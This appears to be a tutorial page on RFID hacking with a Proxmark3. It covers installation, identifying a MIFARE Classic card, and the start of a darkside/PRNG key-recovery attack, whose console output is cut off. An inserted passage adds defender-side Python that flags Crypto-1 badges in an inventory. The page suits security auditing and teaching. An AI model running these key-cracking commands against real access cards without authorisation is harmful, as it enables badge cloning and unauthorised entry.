RFID Hacking
Prepare
- Install Proxmark3
- Check Proxmark3 / card status
Crack Keys
- PRNG Attack
- NESTED Attack
- Dump data & Write data
Prepare
Install Proxmark3
$ sudo apt-get install git build-essential libreadline5 libreadline-dev gcc-arm-none-eabi libusb-0.1-4 libusb-dev libqt4-dev ncurses-dev perl pkg-config
$ git clone https://github.com/Proxmark/proxmark3.git
$ cd proxmark3
$ make clean && make
Check Proxmark3 / card status
Show version information about the connected Proxmark.
proxmark3> hw version
[[[ Cached information ]]]
Prox/RFID mark3 RFID instrument
uC: AT91SAM7S256 Rev C
Embedded Processor: ARM7TDMI
Nonvolatile Program Memory Size: 256K bytes. Used: 0 bytes ( 0%). Free: 262144 bytes (100%).
Second Nonvolatile Program Memory Size: None
Internal SRAM Size: 64K bytes
Architecture Identifier: AT91SAM7Sxx Series
Nonvolatile Program Memory Type: Embedded Flash Memory
proxmark3> hw tune
Measuring antenna characteristics, please wait........
# LF antenna: 30.39 V @ 125.00 kHz
# LF antenna: 32.45 V @ 134.00 kHz
# LF optimal: 37.40 V @ 129.03 kHz
# HF antenna: 18.54 V @ 13.56 MHz
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
Crack Keys
Act like an ISO14443 Type A reader
proxmark3> hf 14a reader
UID : f3 34 9b ce
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
Answers to chinese magic backdoor commands: NO
Read the parity error messages. The next step is to extract at least one valid sector key (A or B). The darkside attack implementation in this firmware version of the Proxmark takes only about 9 seconds to complete. In this case the key that was found is one of the default keys, but that does not affect the speed of the attack.
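As an added defender-side example (not part of the original page or of the Proxmark3 project), the following Python parses the hf 14a reader output shown above and classifies the credential by its SAK byte, so an inventory of deployed badges can flag which ones are Crypto-1 (MIFARE Classic) cards whose sector keys are recoverable. The SAK table follows NXP's published values (AN10833); the sample text is copied from the session above, and the function names are my own.

```python
import re

# Sample client output, copied from the hf 14a reader session above (test input).
SAMPLE = """UID : f3 34 9b ce
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
Answers to chinese magic backdoor commands: NO
"""

# SAK values per NXP AN10833; only the families relevant to this page are listed.
SAK_FAMILY = {
    0x08: "MIFARE Classic 1K (or Plus 2K in SL1)",
    0x18: "MIFARE Classic 4K (or Plus 4K in SL1)",
    0x09: "MIFARE Mini",
    0x00: "MIFARE Ultralight / NTAG",
    0x20: "ISO14443-4 card (e.g. DESFire, Plus SL3)",
}

def parse_reader_output(text):
    """Pull UID, ATQA, SAK and the magic-backdoor answer out of the client output."""
    card = {}
    for line in text.splitlines():
        m = re.match(r"\s*(UID|ATQA|SAK)\s*:\s*([0-9a-fA-F ]+)", line)
        if m:  # hex bytes separated by spaces; trailing "[2]" on SAK is ignored
            card[m.group(1).lower()] = bytes.fromhex(m.group(2).replace(" ", ""))
        if "magic backdoor commands" in line:
            card["magic"] = line.rstrip().endswith("YES")
    return card

def assess(card):
    """Defender-side findings: what family the credential is and why that matters."""
    sak = card["sak"][0]
    findings = ["family: " + SAK_FAMILY.get(sak, "unknown SAK 0x%02x" % sak)]
    if sak & 0x20:  # bit 6 of SAK: card speaks ISO14443-4 (application layer)
        findings.append("ISO14443-4 capable: review the application-layer protocol")
    if sak in (0x08, 0x18, 0x09):  # Crypto-1 families
        findings.append("Crypto-1 cipher: sector keys recoverable (darkside/nested); "
                        "treat the card as an identifier, not a secret")
    if card.get("magic"):
        findings.append("answers magic backdoor commands: UID-writable clone, not factory stock")
    return findings

if __name__ == "__main__":
    for finding in assess(parse_reader_output(SAMPLE)):
        print(finding)
```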
PRNG Attack
proxmark3> hf mf mifare
-------------------------------------------------------------------------
Executing command. Expected execution time: 25sec on average
Press button on the proxmark3 device to abort both proxmark3 and client.
-------------------------------------------------------------------------
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
Parity is all zero. Most likely this card sends NACK on every failed authentication.
Attack will take a few seconds longer because we need two consecutive successful runs.
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can'